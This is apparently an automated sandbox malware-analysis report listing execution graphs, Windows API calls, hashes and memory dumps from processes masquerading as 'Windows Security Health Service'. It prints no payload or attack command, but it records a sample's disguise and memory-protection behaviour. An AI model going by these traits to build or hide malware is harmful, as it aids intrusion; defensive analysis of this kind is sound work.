                                                    • Opcode ID: 9c12cd4fa825f41121bb1a1219c39b08128828f8f027cf52803035d05687c75f
                                                    • Instruction ID: d894674065a8aae0710a751292694ef6facdb2898386c517c727b24efa7ffc47
                                                    • Opcode Fuzzy Hash: 9c12cd4fa825f41121bb1a1219c39b08128828f8f027cf52803035d05687c75f
                                                    • Instruction Fuzzy Hash: 23B1B774E002099FDB54DFA9D990A9DFBF6FF88300F10862AE419AB355DB74A905CF90
                                                    Function 04570308 Relevance: 5.0, Strings: 4, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2245304363.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_4570000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q$$]q$$]q
                                                    • API String ID: 0-978391646
                                                    • Opcode ID: 6443876d1c82dc358a61aca2417eac41a6b6b97e5c0d5419482c2460307d523f
                                                    • Instruction ID: d405755d95a1e9ac861915607d4fa0781656f6c0458c7f2cabd483d467bd8947
                                                    • Opcode Fuzzy Hash: 6443876d1c82dc358a61aca2417eac41a6b6b97e5c0d5419482c2460307d523f
                                                    • Instruction Fuzzy Hash: ED0162217097858FC72B563828305296FB26FC2D5031A46E7C4A1CF2E7DE299D05D367

                                                    Execution Graph

                                                    Execution Coverage:24.6%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:5
                                                    Total number of Limit Nodes:1
                                                    execution_graph 1659 7ff848f43dbe 1661 7ff848f43def 1659->1661 1660 7ff848f43f5b 1661->1660 1662 7ff848f440e4 NtProtectVirtualMemory 1661->1662 1663 7ff848f44125 1662->1663

                                                    Executed Functions

                                                    Function 00007FF848F43DBE Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 445nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.2477533962.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff848f40000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID: HAH$HAH$cR_H
                                                    • API String ID: 2706961497-754075854
                                                    • Opcode ID: 8aaf4664fac611366b2028b684e1d280880a3fc1d2f87ea1cd95f96bd0af325b
                                                    • Instruction ID: a64b6058c364e4e8c2b13260b90979020fb25b5457c0ee1cb12a3ba3547ae169
                                                    • Opcode Fuzzy Hash: 8aaf4664fac611366b2028b684e1d280880a3fc1d2f87ea1cd95f96bd0af325b
                                                    • Instruction Fuzzy Hash: 6CC1683190DB495FE71DAB3898466FA77E1EFA6760F0441BFD08AC31D7DE2868068781

                                                    Execution Graph

                                                    Execution Coverage:8.5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:48
                                                    Total number of Limit Nodes:6
                                                    execution_graph 11709 2b8e208 11710 2b8e21d 11709->11710 11714 2b8e230 11710->11714 11718 2b8da28 11710->11718 11713 2b8da28 OleInitialize 11715 2b8e26f 11713->11715 11715->11714 11723 2b8dafc 11715->11723 11717 2b8e31c 11720 2b8da33 11718->11720 11719 2b8e23e 11719->11713 11719->11714 11720->11719 11721 2b8dafc OleInitialize 11720->11721 11722 2b8e31c 11721->11722 11724 2b8db07 11723->11724 11725 2b8e633 11724->11725 11727 2b8db18 11724->11727 11725->11717 11728 2b8e668 OleInitialize 11727->11728 11729 2b8e6cc 11728->11729 11729->11725 11730 2b80848 11731 2b80852 11730->11731 11733 2b821b3 11730->11733 11734 2b821d5 11733->11734 11738 2b822af 11734->11738 11742 2b822c0 11734->11742 11740 2b822c0 11738->11740 11739 2b823c4 11740->11739 11746 2b81980 11740->11746 11744 2b822e7 11742->11744 11743 2b823c4 11743->11743 11744->11743 11745 2b81980 CreateActCtxA 11744->11745 11745->11743 11747 2b83350 CreateActCtxA 11746->11747 11749 2b83413 11747->11749 11691 2b8c110 11692 2b8c16c FindWindowExA 11691->11692 11694 2b8c25f 11692->11694 11695 2b8d5f0 11696 2b8d636 GetCurrentProcess 11695->11696 11698 2b8d688 GetCurrentThread 11696->11698 11699 2b8d681 11696->11699 11700 2b8d6be 11698->11700 11701 2b8d6c5 GetCurrentProcess 11698->11701 11699->11698 11700->11701 11702 2b8d6fb 11701->11702 11703 2b8d723 GetCurrentThreadId 11702->11703 11704 2b8d754 11703->11704 11705 2b8bbd0 11707 2b8bc25 FindWindowA 11705->11707 11708 2b8bd14 11707->11708 11750 2b8dc40 DuplicateHandle 11751 2b8dcd6 11750->11751

                                                    Executed Functions

                                                    Function 02B8D5B0 Relevance: 6.1, APIs: 4, Instructions: 148threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 294 2b8d5b0-2b8d67f GetCurrentProcess 301 2b8d688-2b8d6bc GetCurrentThread 294->301 302 2b8d681-2b8d687 294->302 303 2b8d6be-2b8d6c4 301->303 304 2b8d6c5-2b8d6f9 GetCurrentProcess 301->304 302->301 303->304 306 2b8d6fb-2b8d701 304->306 307 2b8d702-2b8d71a 304->307 306->307 318 2b8d71d call 2b8dfa8 307->318 319 2b8d71d call 2b8dbae 307->319 310 2b8d723-2b8d752 GetCurrentThreadId 311 2b8d75b-2b8d7bd 310->311 312 2b8d754-2b8d75a 310->312 312->311 318->310 319->310
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 02B8D66E
                                                    • GetCurrentThread.KERNEL32 ref: 02B8D6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 02B8D6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 02B8D741
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: f09a9c3ef53ebab32bf4b6325fcc96754ac0e385329e57c1a0d9c673daaccd00
                                                    • Instruction ID: e2cda15a636c57c189ad69fd2a90c3bcc32bca3c37ae85bef83e847dbe89d023
                                                    • Opcode Fuzzy Hash: f09a9c3ef53ebab32bf4b6325fcc96754ac0e385329e57c1a0d9c673daaccd00
                                                    • Instruction Fuzzy Hash: 976179B09043898FDB05DFA9D598BEEBFF1EF49304F24849AD048A73A1D7789844CB65
                                                    Function 02B8D5F0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 320 2b8d5f0-2b8d67f GetCurrentProcess 324 2b8d688-2b8d6bc GetCurrentThread 320->324 325 2b8d681-2b8d687 320->325 326 2b8d6be-2b8d6c4 324->326 327 2b8d6c5-2b8d6f9 GetCurrentProcess 324->327 325->324 326->327 329 2b8d6fb-2b8d701 327->329 330 2b8d702-2b8d71a 327->330 329->330 341 2b8d71d call 2b8dfa8 330->341 342 2b8d71d call 2b8dbae 330->342 333 2b8d723-2b8d752 GetCurrentThreadId 334 2b8d75b-2b8d7bd 333->334 335 2b8d754-2b8d75a 333->335 335->334 341->333 342->333
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 02B8D66E
                                                    • GetCurrentThread.KERNEL32 ref: 02B8D6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 02B8D6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 02B8D741
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 96dcd75efedef56d1a0111423946c51874473eabe91c9ca64d8ef3d5c4e27d1b
                                                    • Instruction ID: d4bb1fc6b6551a742587d440ab9b03c28065052a32fd8fe8feea91fb49ccbd35
                                                    • Opcode Fuzzy Hash: 96dcd75efedef56d1a0111423946c51874473eabe91c9ca64d8ef3d5c4e27d1b
                                                    • Instruction Fuzzy Hash: 8B5149B0D002498FDB14DFA9D588BAEBBF6FF48314F20849AD019A73A0D7745944CF65
                                                    Function 02B8C110 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 940 2b8c110-2b8c178 942 2b8c17a-2b8c184 940->942 943 2b8c1b1-2b8c1d1 940->943 942->943 944 2b8c186-2b8c188 942->944 948 2b8c20a-2b8c25d FindWindowExA 943->948 949 2b8c1d3-2b8c1dd 943->949 946 2b8c18a-2b8c194 944->946 947 2b8c1ab-2b8c1ae 944->947 950 2b8c198-2b8c1a7 946->950 951 2b8c196 946->951 947->943 959 2b8c25f-2b8c265 948->959 960 2b8c266-2b8c29e 948->960 949->948 952 2b8c1df-2b8c1e1 949->952 950->950 953 2b8c1a9 950->953 951->950 954 2b8c1e3-2b8c1ed 952->954 955 2b8c204-2b8c207 952->955 953->947 957 2b8c1ef 954->957 958 2b8c1f1-2b8c200 954->958 955->948 957->958 958->958 961 2b8c202 958->961 959->960 965 2b8c2ae-2b8c2b2 960->965 966 2b8c2a0-2b8c2a4 960->966 961->955 967 2b8c2c2 965->967 968 2b8c2b4-2b8c2b8 965->968 966->965 969 2b8c2a6-2b8c2a9 call 2b80224 966->969 973 2b8c2c3 967->973 968->967 970 2b8c2ba-2b8c2bd call 2b80224 968->970 969->965 970->967 973->973
                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 02B8C24D
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: c76a52bb867dcaeb6f8e0a70628fc4117cdd57747af2dff797df3307d4921903
                                                    • Instruction ID: c480c70306d23f2b4e718ecf6df6081fa88e7f6daddd88836189a1113eebce86
                                                    • Opcode Fuzzy Hash: c76a52bb867dcaeb6f8e0a70628fc4117cdd57747af2dff797df3307d4921903
                                                    • Instruction Fuzzy Hash: 465167B1D002499FDB14EFE9C9857AEFBF1EF48700F10816AE859A7294D7749841CF92
                                                    Function 02B8C106 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 906 2b8c106-2b8c178 908 2b8c17a-2b8c184 906->908 909 2b8c1b1-2b8c1d1 906->909 908->909 910 2b8c186-2b8c188 908->910 914 2b8c20a-2b8c20f 909->914 915 2b8c1d3-2b8c1dd 909->915 912 2b8c18a-2b8c194 910->912 913 2b8c1ab-2b8c1ae 910->913 916 2b8c198-2b8c1a7 912->916 917 2b8c196 912->917 913->909 922 2b8c219-2b8c25d FindWindowExA 914->922 915->914 918 2b8c1df-2b8c1e1 915->918 916->916 919 2b8c1a9 916->919 917->916 920 2b8c1e3-2b8c1ed 918->920 921 2b8c204-2b8c207 918->921 919->913 923 2b8c1ef 920->923 924 2b8c1f1-2b8c200 920->924 921->914 925 2b8c25f-2b8c265 922->925 926 2b8c266-2b8c29e 922->926 923->924 924->924 927 2b8c202 924->927 925->926 931 2b8c2ae-2b8c2b2 926->931 932 2b8c2a0-2b8c2a4 926->932 927->921 933 2b8c2c2 931->933 934 2b8c2b4-2b8c2b8 931->934 932->931 935 2b8c2a6-2b8c2a9 call 2b80224 932->935 939 2b8c2c3 933->939 934->933 936 2b8c2ba-2b8c2bd call 2b80224 934->936 935->931 936->933 939->939
                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 02B8C24D
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: f568a3c5f2e501d73bfa0e6e5e0cad5f50c873c3ef9b6192782c3e5a2d4ad856
                                                    • Instruction ID: bf31f002e6a542b8da9da267fce634529de1811b4e9b426678f4b656fae9e517
                                                    • Opcode Fuzzy Hash: f568a3c5f2e501d73bfa0e6e5e0cad5f50c873c3ef9b6192782c3e5a2d4ad856
                                                    • Instruction Fuzzy Hash: D05166B1E002499FDB14EFE9C9817ADBBF1FF48700F14816AE859A7294DB749841CF92
                                                    Function 02B8BBC4 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 974 2b8bbc4-2b8bc31 976 2b8bc6a-2b8bc8a 974->976 977 2b8bc33-2b8bc3d 974->977 984 2b8bc8c-2b8bc96 976->984 985 2b8bcc3-2b8bd12 FindWindowA 976->985 977->976 978 2b8bc3f-2b8bc41 977->978 979 2b8bc43-2b8bc4d 978->979 980 2b8bc64-2b8bc67 978->980 982 2b8bc4f 979->982 983 2b8bc51-2b8bc60 979->983 980->976 982->983 983->983 986 2b8bc62 983->986 984->985 987 2b8bc98-2b8bc9a 984->987 991 2b8bd1b-2b8bd53 985->991 992 2b8bd14-2b8bd1a 985->992 986->980 989 2b8bc9c-2b8bca6 987->989 990 2b8bcbd-2b8bcc0 987->990 993 2b8bca8 989->993 994 2b8bcaa-2b8bcb9 989->994 990->985 999 2b8bd63-2b8bd67 991->999 1000 2b8bd55-2b8bd59 991->1000 992->991 993->994 994->994 995 2b8bcbb 994->995 995->990 1002 2b8bd69-2b8bd6d 999->1002 1003 2b8bd77 999->1003 1000->999 1001 2b8bd5b-2b8bd5e call 2b80224 1000->1001 1001->999 1002->1003 1005 2b8bd6f-2b8bd72 call 2b80224 1002->1005 1007 2b8bd78 1003->1007 1005->1003 1007->1007
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 872689118209e6ddf8cfcf944b8781e03a6a247bef985143b446504b91d655eb
                                                    • Instruction ID: bcb9b0c4759a189f0bee6f2c5fbe79dd7bc5b33cb349a6f23852c2acbd25458a
                                                    • Opcode Fuzzy Hash: 872689118209e6ddf8cfcf944b8781e03a6a247bef985143b446504b91d655eb
                                                    • Instruction Fuzzy Hash: 63516AB1D006599FDB10EFA8C88579EBBF1FF48318F148569E818EB254DB749881CF81
                                                    Function 02B8BBD0 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1008 2b8bbd0-2b8bc31 1010 2b8bc6a-2b8bc8a 1008->1010 1011 2b8bc33-2b8bc3d 1008->1011 1018 2b8bc8c-2b8bc96 1010->1018 1019 2b8bcc3-2b8bd12 FindWindowA 1010->1019 1011->1010 1012 2b8bc3f-2b8bc41 1011->1012 1013 2b8bc43-2b8bc4d 1012->1013 1014 2b8bc64-2b8bc67 1012->1014 1016 2b8bc4f 1013->1016 1017 2b8bc51-2b8bc60 1013->1017 1014->1010 1016->1017 1017->1017 1020 2b8bc62 1017->1020 1018->1019 1021 2b8bc98-2b8bc9a 1018->1021 1025 2b8bd1b-2b8bd53 1019->1025 1026 2b8bd14-2b8bd1a 1019->1026 1020->1014 1023 2b8bc9c-2b8bca6 1021->1023 1024 2b8bcbd-2b8bcc0 1021->1024 1027 2b8bca8 1023->1027 1028 2b8bcaa-2b8bcb9 1023->1028 1024->1019 1033 2b8bd63-2b8bd67 1025->1033 1034 2b8bd55-2b8bd59 1025->1034 1026->1025 1027->1028 1028->1028 1029 2b8bcbb 1028->1029 1029->1024 1036 2b8bd69-2b8bd6d 1033->1036 1037 2b8bd77 1033->1037 1034->1033 1035 2b8bd5b-2b8bd5e call 2b80224 1034->1035 1035->1033 1036->1037 1039 2b8bd6f-2b8bd72 call 2b80224 1036->1039 1041 2b8bd78 1037->1041 1039->1037 1041->1041
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 340d3fddd003b41889f2a0bf36a02cc72e304670a7c6fa0dd03bbd7d065445a9
                                                    • Instruction ID: c46730bbc81af0a4462bcf9f5f35be8f7b346fb6e358119a3aa6d6f020ea8bf1
                                                    • Opcode Fuzzy Hash: 340d3fddd003b41889f2a0bf36a02cc72e304670a7c6fa0dd03bbd7d065445a9
                                                    • Instruction Fuzzy Hash: 365148B1D006599FDB10EFA9C885B9EBBF1FF48318F148569E818E7254DBB49881CF81
                                                    Function 02B83347 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1042 2b83347-2b8334e 1043 2b83350-2b83411 CreateActCtxA 1042->1043 1045 2b8341a-2b83474 1043->1045 1046 2b83413-2b83419 1043->1046 1053 2b83483-2b83487 1045->1053 1054 2b83476-2b83479 1045->1054 1046->1045 1055 2b83498 1053->1055 1056 2b83489-2b83495 1053->1056 1054->1053 1058 2b83499 1055->1058 1056->1055 1058->1058
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02B83401
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 722249c575080a7ae787608f3f23a391d55ad0da62454a98db1376ef4e9e00e5
                                                    • Instruction ID: d4fd18cd491cf34d258275cb167e0e316ad7fe9b4421b4cac18c5bfe6e7c56f6
                                                    • Opcode Fuzzy Hash: 722249c575080a7ae787608f3f23a391d55ad0da62454a98db1376ef4e9e00e5
                                                    • Instruction Fuzzy Hash: 3E41F5B0C00719CBEB25DFA9C844B8DFBF5BF49704F28809AD409AB255DB756946CF90
                                                    Function 02B81980 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1059 2b81980-2b83411 CreateActCtxA 1062 2b8341a-2b83474 1059->1062 1063 2b83413-2b83419 1059->1063 1070 2b83483-2b83487 1062->1070 1071 2b83476-2b83479 1062->1071 1063->1062 1072 2b83498 1070->1072 1073 2b83489-2b83495 1070->1073 1071->1070 1075 2b83499 1072->1075 1073->1072 1075->1075
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02B83401
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 10284e386d5afb13e41517d8b727c0e859a0849e76b856fe8bdecbdd87b75d8c
                                                    • Instruction ID: 0c881d8945d149e4ad2f87c155bbf8a3786a4346f7f1ea1665f38d4ae659af60
                                                    • Opcode Fuzzy Hash: 10284e386d5afb13e41517d8b727c0e859a0849e76b856fe8bdecbdd87b75d8c
                                                    • Instruction Fuzzy Hash: BE41E4B0C0071DCBEB25DFA9C844B9DBBF5BF48704F2480AAD409AB255DB756946CF90
                                                    Function 02B8DC3B Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1076 2b8dc3b-2b8dcd4 DuplicateHandle 1077 2b8dcdd-2b8dcfa 1076->1077 1078 2b8dcd6-2b8dcdc 1076->1078 1078->1077
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B8DCC7
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 2871f7f12859ccff891f2af65494e506cfa431ee283bc9e5bdfb82403fec3ce9
                                                    • Instruction ID: c698b96684bf93f88ac26ce97c85192c569415cbca7f441b1eaac30863497ea3
                                                    • Opcode Fuzzy Hash: 2871f7f12859ccff891f2af65494e506cfa431ee283bc9e5bdfb82403fec3ce9
                                                    • Instruction Fuzzy Hash: 0B21E4B59002499FDB10CFA9D984ADEBBF5FB48310F14845AE918A7350C378A944CFA4
                                                    Function 02B8DC40 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B8DCC7
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: c7adfd4f1656e0e89df5e5ef9294c32e2c6c45ee336b5f13cf208b6d4a8c8684
                                                    • Instruction ID: 61bee03ac53a08e41510cd0eaba631aace8382add6204b917c31e8625d87d0d1
                                                    • Opcode Fuzzy Hash: c7adfd4f1656e0e89df5e5ef9294c32e2c6c45ee336b5f13cf208b6d4a8c8684
                                                    • Instruction Fuzzy Hash: 2A21E2B59002499FDB10CFAAD984ADEBBF8FB48310F14845AE918A3350D378A940CFA1
                                                    Function 02B8DB18 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 02B8E6BD
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 90aaa97e0cd1a8e119debbb8ff07518398ececb1f9c49a9d1e2be5ad3e385fa8
                                                    • Instruction ID: 94587e9d37eea27b3fd770aee292e0b6a0d4f3cad2ec65fa9b2bd01ae2702a41
                                                    • Opcode Fuzzy Hash: 90aaa97e0cd1a8e119debbb8ff07518398ececb1f9c49a9d1e2be5ad3e385fa8
                                                    • Instruction Fuzzy Hash: B71123B19047488FDB20EF9AD548BDEFBF8EB48320F208459E518A7350D379A944CFA5
                                                    Function 02B8E660 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 02B8E6BD
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 97cc7c8325a78f7a4d0b5ae598fd28e9e7f29ad59d5179e8263cdee5a1eded6e
                                                    • Instruction ID: 44666aa42e9e330958a5ba179e670b445eb613e6497018382c1600c3815bce83
                                                    • Opcode Fuzzy Hash: 97cc7c8325a78f7a4d0b5ae598fd28e9e7f29ad59d5179e8263cdee5a1eded6e
                                                    • Instruction Fuzzy Hash: 8E1115B1D002498FDB20DF9AD588BDEBFF4EB48320F248459E559A7710C378A544CFA5
                                                    Function 02A6D4D8 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2476562791.0000000002A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A6D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2a6d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f67d992c4e89adf772579712dde62578eae83952ac76c650c8395ef4b40be356
                                                    • Instruction ID: 27427a84dd448efb609957197d963da6ba15900a0ed068b9b7a0d8c237fa92ab
                                                    • Opcode Fuzzy Hash: f67d992c4e89adf772579712dde62578eae83952ac76c650c8395ef4b40be356
                                                    • Instruction Fuzzy Hash: C1216771600744DFDB05DF14C9C8F36BF65FB88358F208169E9090B656C73AD806CBA2
                                                    Function 02A6D4D3 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2476562791.0000000002A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A6D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2a6d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: 11feff2f7a732d6e316767ea3a054f26bf876187b61f78055f19a0e304c1c91a
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: 9311D376504680CFCB16CF14D5C4B26BF71FB88318F24C6A9D9094B656C33AD45ACBA2

                                                    Execution Graph

                                                    Execution Coverage:24.5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:23
                                                    Total number of Limit Nodes:1

                                                    Executed Functions

                                                    Function 00007FF848F33DBE Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 445nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID: H$HAH$HAH$cS_H
                                                    • API String ID: 2706961497-573668203
                                                    • Opcode ID: d0a5022ba52f5712075eba0a3252afbf694e76d83855f9b824cb06e1fe69ccf4
                                                    • Instruction ID: 3499935f4cf1995a3480af0d10f99b90f9135afb30aac355bacc7d83b0198b84
                                                    • Opcode Fuzzy Hash: d0a5022ba52f5712075eba0a3252afbf694e76d83855f9b824cb06e1fe69ccf4
                                                    • Instruction Fuzzy Hash: DFC1353190DA895FE71DEB7898562FA77E1EFA6350F0441BFD08AC31D7DE2868068781
                                                    Function 00007FF848F32972 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c30974071c77be536358391b4a501c615bc5c51002ecaa5653ea3240406571bf
                                                    • Instruction ID: 7cf07313c6556e0f3877f053eb1c53c82ade7755690bf19d9c6aa36309091944
                                                    • Opcode Fuzzy Hash: c30974071c77be536358391b4a501c615bc5c51002ecaa5653ea3240406571bf
